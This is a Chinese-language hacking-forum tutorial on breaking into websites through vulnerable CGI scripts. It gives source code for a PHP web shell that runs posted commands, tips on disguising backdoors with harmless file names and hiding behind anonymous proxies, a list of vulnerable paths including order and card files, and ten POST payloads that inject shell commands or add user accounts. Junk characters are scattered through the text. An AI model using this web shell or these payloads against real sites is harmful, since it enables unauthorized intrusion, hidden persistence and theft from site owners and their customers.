CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
9 y9 y$ G7 O( d大家好 我是bboyhip  只是一名菜菜的exploiter
! W7 z" h# P2 o8 \很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
" p: M& m5 N1 v) m* M我会长长来玩的
前言:
1 u. z0 U3 t4 @# ?以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
2 E8 C, e2 f8 Z8 B1 W9 B4 g5 N所以有很多网站程序有6成都会使用cgi 脚本来管理
7 e& U- ^4 l! c- |/ R& b5 ]目录为/cgi-bin/
: z" t7 |: l; `- o6 t* e/ P
' ]' e% Y9 y! Q( E只是个人在实务上一些经验
7 F, o# T# {1 v2 l6 [. r0 I2 Y写的不好 请多多见谅喔
2 d3 Z# \/ L* v在这里我简单分为几个部份一定要會的
7 T7 E2 L1 X4 N$ [' |讲解一下
让没有基础的人很容易上手

' Q  s4 n# T5 Q; }0 S2 k3 o( |以下内容跟帖回复才能看到
==============================

6 D5 D" r$ z5 j  C第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
4 D" H; F  u0 u; u8 r
对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
6 {% i) a# ]1 W# s6 X1 D# a: F+ O所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
以下是一些常见及重要的指令:
; P$ Z' B; M$ E! jpwd: 显示当前目录, 即是後门/程式所在的位置
' T) h0 k4 l" p: P, G' e- E如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
: A/ W9 G: u6 R' ]. n: l4 fls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
( V. w4 j" e/ jcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
8 F* G* U( Z& ?, cwho: 显示谁login 至系统
3 a* \/ ]* F# ]/ b; @4 s/ ]: Y4 u3 Fman: 显示指令用法  
$ T( p2 }1 R7 ^# @) D1 yman ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
0 O/ H& o% _* K& N8 M/ V$ g6 Emv 移动档案
2 {. n" m; ~  k0 l5 Hrm 删除档案
7 G3 Y1 J8 t; `0 l5 `$ @
第3部份: Shell的使用
1 Z1 s9 Q& W" W) K- |, c" v例如:
http://site.com/refer.php
* W$ c8 A% v& v这是我的後门, 原代码如下:
" a- `* ]& B9 k* x! G0 Z<Form Action="#" Method="POST">
& d$ D) p: U: ^9 e- P! n- M<Input type="text" name="cmd">
' `: N9 p5 S' t# U5 ~. u<Input type="Submit">
</Form>
<?php
- L  h8 g' I* j6 y0 _1 Z- h$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
6 o  h' D( v  @* ~# mecho $Output;
?>
/ `( H" X7 m) C; M4 t1 b- m输入pwd, 可得到绝对路径:
8 w! v2 w( h5 Z6 l; T) G( g+ H/ ^/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

! j3 V! e1 t2 L3 I* V3 N2 C第4部份: 注意事项
" Q0 x) N8 n" s8 T3 Z" k& B  B- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
; ?9 ~% M* U5 e# n, g8 F4 v1 r- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
/ o+ x* m5 l7 D3 j7 A- V! O- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
$ O3 H* c; [: ^; e# t; J4 B- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
6 ~) r) s/ ]; |( I- X/ o' t  i# u# |- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
: z3 z* J: K4 h这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
  @/ M9 ~, z$ |1 |) L开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

0 l4 k5 _3 F' ]7 r. D6 Z' P# ^1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
: W0 M, C; G. s1 v  U8 V: [2 Q2 [E表
  k6 ?% \& S+ v' @$ F, t. f: ~如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
! z) ?( H; ?1 X- ~$ r' Y/cgi-sys/cart.pl
  s  Q# O* q% J+ g' U7 k) t/scripts/cart.pl
8 D! g0 L0 N+ l& Z+ v/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
1 D; ?* Z) O0 k+ M2 `3 _
2 |  @: U! S  c9 G5 w' U- L4 a2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
  S4 Y: S9 h* Q# ^8 _, j因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
7 g& N8 k0 I# c7 x) z; ], Q或是用抓包工具 抓他的语法...等等

( S( v+ _) S9 w: Z5 |1 `6 F以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
( Y, ?! t. Y- T/ ?* [- u/index.cgi
wei=ren&gen=command
8 h6 b* }" y# j2 f3 a6 k; B/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
9 K2 ]6 O3 f0 E+ y% R5 ]2 cusername=username&password=password&ref1=|echo;ls|
/form.cgi
( I$ ?: d/ M/ Y4 G0 Lname=xxxx&email=email&subject=xxxx&response=|echo;ls|
3 ]& O. U! G. h" Y  k, D% E$ Z  \) f5 Z+ u/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
# [: i" A* w1 _/recon.cgi
5 r, l! Y. K" V+ ^9 A- N5 T; G/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
$ P8 y  u( w: }  C$ T1 M/af.cgi_browser_out=|echo;ls -la;exit;|
6 k; J2 s% V  }2 W1 w/ M8 b  {
- X$ P3 K8 c9 M. M: `( P1 s) ]今天就讲到这  感谢大家支持
6 H3 i# d& P  z% t